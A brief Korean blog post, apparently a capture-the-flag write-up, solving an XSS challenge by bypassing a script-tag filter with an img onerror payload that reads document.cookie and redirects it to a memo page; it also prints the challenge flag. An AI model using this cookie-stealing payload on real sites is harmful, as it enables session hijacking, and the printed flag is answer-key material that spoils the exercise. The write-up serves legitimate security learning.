몽골아덤벼라 2024. 5. 25. 00:28

XSS 취약점을 활용해 FLAG를 획득하는 문제

1. XSS-1과 같은 URL이지만 이번에는 스크립트가 작동하지 않는다

 

2. 그럼 XSS를 발생시킬 수 있는 <script>태그가 아닌 다른 태그를 사용한다

3. <img src=x onerror=location.href=”/memo?memo=”+document.cookie> 코드 입력

flag=DH{3c01577e9542ec24d68ba0ffb846508f}